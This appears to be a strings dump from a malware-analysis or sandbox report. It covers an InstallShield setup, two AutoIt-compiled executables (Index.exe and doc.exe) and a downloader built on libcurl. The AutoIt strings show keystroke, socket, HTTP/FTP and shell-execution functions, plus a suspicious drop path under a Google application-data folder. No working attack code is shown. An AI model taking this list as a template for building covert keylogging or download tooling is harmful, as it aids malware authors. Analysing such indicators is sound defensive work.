Setup has detected an incompatible version of Windows. Please click OK and verify that the target system is running Windows 2000 Service Pack 3 (or later version), before relaunching the installationw%s requires the following items to be installed on your computer. Click Install to begin installing these requirements.
Installing %sDWould you like to cancel the setup after %s has finished installing?
The files for installation requirement %s could not be found. The installation will now stop. This is probably due to a failed, or canceled download.XThe installation of %s appears to have failed. Do you want to continue the installation?
Skipped7The installation of %s has failed. Setup will now exit.gThe installation of %s requires a reboot. Click Yes to restart now or No if you plan to restart later.8%1 optionally uses %2. Would you like to install it now?
&Patch an existing instanceWThis installation requires Windows Installer version 4.5 or newer. Setup will now exit.
Authenticity Verified;The identity of this software publisher was verified by %s.lCaution: %s affirms this software is safe. You should only continue if you trust %s to make this assertion.'&Always trust software published by %s.UThis software has not been altered since publication by %s. To install %s, click OK.
%s - InstallShield Wizard
Setup has detected one or more instances of this application already installed on your system. You can maintain or update an existing instance or install a completely new instance.MSelect the instance of the application you want to &maintain or update below:
x%s Setup is preparing the InstallShield Wizard, which will guide you through the rest of the setup process. Please wait.
Error Information:3An error (%s) has occurred while running the setup.
Please make sure you have finished any previous setup and closed other applications. If the error still occurs, please contact your vendor: %s.
&Report}There is not enough space to initialize the setup. Please free up at least %ld KB on your %s drive before you run the setup.{A user with administrator rights installed this application. You need to have similar privileges to modify or uninstall it.tAnother instance of this setup is already running. Please wait for the other instance to finish and then try again.
The origin and integrity of this application could not be verified. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified because it was not signed by the publisher. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.
The origin and integrity of this application could not be verified. The certificate used to sign the software has expired or is invalid or untrusted. You should continue only if you can identify the publisher as someone you trust and are certain this application hasn't been altered since publication.jThe software is corrupted or has been altered since it was published. You should not continue this setup.0This setup was created with a BETA VERSION of %s7This Setup was created with an EVALUATION VERSION of %s
This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full version of InstallShield supports this functionality. For more information, see InstallShield KB article Q200900.
This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s days after they were built. Please rebuild the setup to run it again. The setup will now exit.3This setup works until %s. The setup will now exit.
The path to the installation contains unsupported characters. Try moving the installation to a location that does not have special characters, and then try relaunching it.iThis setup requires administrative privileges that appear to be unavailable. Would you like to try again?
Copyright (c) 2014 Flexera Software LLC. All Rights Reserved.
InstallShield Setup.exe
21.0.289

Index.exe_1204:

.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Index.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

doc.exe_640:

.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

bdMiniDownloaderEG_MENAON-Mini_32_3313.exe_1128:

.text
`.rdata
@.data
.rsrc
@.reloc
<!--%s-->
&#xX;
</%s>
%s='%s'
%s="%s"
<![CDATA[%s]]>
standalone="%s"
encoding="%s"
version="%s"
RegOpenKeyTransactedW
RegCreateKeyTransactedW
httpheader
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
portuguese-brazilian
.jpeg
.html
0123456789
PORT
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Closing connection %d
Curl_addHandleToPipeline: length: %d
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Internal error clearing splay node = %d
Internal error removing splay node = %d
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Send failure: %s
Recv failure: %s
[%s %s %s]
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%hu
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
CLIENT libcurl 7.30.0
MATCH %s %s %s
DEFINE %s %s
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Accept-Encoding: %s
Referer: %s
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LOGIN
USER %s
APOP %s %s
AUTH %s
No known authentication mechanisms supported!
STLS not supported.
STARTTLS denied. %c
Access denied. %c
Access denied: %d
Authentication failed: %d
PASS %s
%s %s
POP3S not supported!
login
password
%cd
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]
APPEND %s (\Seen) {%lld}
LOGINDISABLED
STARTTLS not supported.
IMAPS not supported!
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
Adding handle: send: %d
Adding handle: recv: %d
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
Server %s is not blacklisted
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
%d.%d.%d.%d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload: 
RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld bytes received
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
SMTP
EHLO %s
HELO %s
AUTH %s %s
Got unexpected smtp-server response: %d
Remote access denied: %d
smtp
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
MAIL failed: %d
RCPT failed: %d
SMTPS not supported!
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%s xxxxxxxxxxxxxxxx
00000001
12345678
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
0123456789-
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
SYN.ACK
ACK.SYN
XXX
E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb
WS2_32.dll
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCrackUrlW
WININET.dll
SHLWAPI.dll
IPHLPAPI.DLL
PSAPI.DLL
PeekNamedPipe
GetCPInfo
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
ole32.dll
ShellExecuteExW
SHFileOperationW
SHELL32.dll
GDI32.dll
GdiplusShutdown
gdiplus.dll
WSOCK32.dll
WinHttpCloseHandle
WinHttpGetProxyForUrl
WinHttpOpen
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WLDAP32.dll
?456789:;<=
!"#$%&'()* ,-./0123
<4,$?7/'
(3-!0,1'8"5.*2$
zcÁ
.?AVCMD5Checksum@@
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:40F702BB9E9011E38C119B9D36C7DD62" xmpMM:DocumentID="xmp.did:40F702BC9E9011E38C119B9D36C7DD62"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:40F702B99E9011E38C119B9D36C7DD62" stRef:documentID="xmp.did:40F702BA9E9011E38C119B9D36C7DD62"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
